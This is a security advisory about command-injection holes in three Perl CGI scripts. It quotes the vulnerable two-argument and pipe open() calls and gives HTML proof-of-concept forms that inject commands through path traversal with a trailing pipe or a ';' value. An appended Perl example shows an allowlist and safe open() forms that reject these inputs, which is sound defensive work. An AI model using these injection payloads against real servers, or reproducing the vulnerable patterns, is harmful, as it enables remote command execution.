Tammie's HUSBAND scripts ad.cgi insecure input validation vulnerability

    Tammie's HUSBAND scripts



    'rpc' found a number of bugs in "Scripts by Tammie's HUSBAND".
    ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure
    input validation vulnerability. Information on ad.cgi is
    available at:

    Code snippet:

        $filename = "$FORM{'file'}";
        $datafile = "$basedir" . "$filename";
        open (INFO, "$datafile");


    <form action="" method=POST>
    <h1>ad.cgi exploit</h1>
    Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5|">
    <input type=submit value=run>

    everythingform.cgi uses a hidden field 'config' to determine
    where to read configuration data from.

    Code snippet:

        $ConfigFile = $in{config};
        open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in the ReadConfig subroutine. Reason: $!");

    Information regarding everythingform can be found at:

    Sample exploit:

    <form action="" method=POST>
    <h1>everythingform.cgi exploit</h1>
    Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5|">
    <input type=hidden name=Name value="fuck the religious right">
    <input type=hidden name="e-mail" value="">
    <input type=hidden name=FavoriteColor value=Black>
    <input type=submit value=run>

    simplestmail.cgi is another Perl CGI written by "Tammie's HUSBAND",
    Leif Wright.  It's available from:

    The code is self-explanatory:

        $youremail = $contents_by_name{'MyEmail'};
        open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";

    Exploitation is straightforward:

    <form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
    Command: <input type=text name=MyEmail value=";">
    <input type=hidden name=redirect value="">
    <input type=submit name=submit value="run">


    Nothing yet.
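
    All three snippets above pass request data to Perl's two-argument
    or shell-pipe open(), where a trailing "|" or shell metacharacters
    turn a file name or address into a command. The following is an
    added example, not code from the advisory or from the scripts'
    author, showing hardened equivalents; the $basedir and $mailprog
    values, the helper names and the allowlist patterns are assumptions.

```perl
use strict;
use warnings;

# Assumed values for illustration; each real script sets its own.
my $basedir  = '/var/www/data/';
my $mailprog = '/usr/sbin/sendmail';

# Allowlist for a bare file name: first character alphanumeric, no slashes,
# so "../" sequences, spaces and a trailing "|" are all rejected.
sub safe_name {
    my ($name) = @_;
    return unless defined $name;
    return $name =~ /\A([A-Za-z0-9][A-Za-z0-9_.-]{0,63})\z/ ? $1 : undef;
}

# Conservative address allowlist; the first character cannot be "-", so the
# value can never be read as a command-line option by the mail program.
sub safe_addr {
    my ($addr) = @_;
    return unless defined $addr;
    return $addr =~ /\A([A-Za-z0-9][A-Za-z0-9._%+-]*\@[A-Za-z0-9][A-Za-z0-9.-]*)\z/ ? $1 : undef;
}

# Three-argument open: the mode is fixed to '<', so the name is only ever
# treated as a path and cannot start a command.
sub open_data_file {
    my ($requested) = @_;
    my $name = safe_name($requested);
    return unless defined $name;
    open(my $fh, '<', "$basedir$name") or return;
    return $fh;
}

# List-form pipe open: program and argument go straight to exec with no
# shell in between, so ";" and "|" have no special meaning.
sub open_mail_pipe {
    my ($requested) = @_;
    my $addr = safe_addr($requested);
    return unless defined $addr;
    open(my $mail, '|-', $mailprog, $addr) or return;
    return $mail;
}

# Constructed inputs: benign values plus the ones from the forms above.
for my $v ('banner1.txt', '../../../../../../../../bin/ping -c 5|', 'user@example.org', ';') {
    printf "%-42s file=%s addr=%s\n", $v,
        map { defined $_ ? 'ok' : 'rejected' } scalar safe_name($v), scalar safe_addr($v);
}
```

    The input allowlist and the open() form are independent layers:
    either one alone blocks the values shown in the forms above.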

